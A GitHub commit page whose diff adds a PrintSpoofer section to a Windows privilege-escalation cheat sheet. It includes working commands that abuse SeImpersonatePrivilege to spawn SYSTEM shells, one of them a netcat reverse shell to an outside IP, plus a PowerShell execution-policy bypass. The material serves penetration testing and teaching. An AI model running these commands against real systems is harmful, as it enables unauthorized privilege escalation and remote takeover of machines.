Skip to content

Commit bb71d4a

Browse files
authored
Merge pull request #696 from jenaye/PrintSpoofer
[Add] - Priv esc windows (PrintSpoofer)
2 parents d93a228 + 4684fed commit bb71d4a

File tree

1 file changed

+16
-0
lines changed

1 file changed

+16
-0
lines changed

Methodology and Resources/Windows - Privilege Escalation.md

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -49,6 +49,7 @@
4949
* [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
5050
* [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver))
5151
* [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw))
52+
* [PrintSpoofer (Printer Bug)](#PrintSpoofer-Printer-Bug)))
5253
* [EoP - Privileged File Write](#eop---privileged-file-write)
5354
* [DiagHub](#diaghub)
5455
* [UsoDLLLoader](#usodllloader)
@@ -1264,6 +1265,21 @@ JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juic
12641265
```
12651266

12661267

1268+
### PrintSpoofer (Printer Bug)
1269+
1270+
> this work if SeImpersonatePrivilege is enabled
1271+
1272+
* Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
1273+
1274+
```powershell
1275+
# run nc -lnvp 443 then :
1276+
.\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd"
1277+
# without listener
1278+
.\PrintSpoofer64.exe -i -c cmd
1279+
# Via RPD
1280+
.\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass"
1281+
```
1282+
12671283
## EoP - Privileged File Write
12681284

12691285
### DiagHub

0 commit comments

Comments
 (0)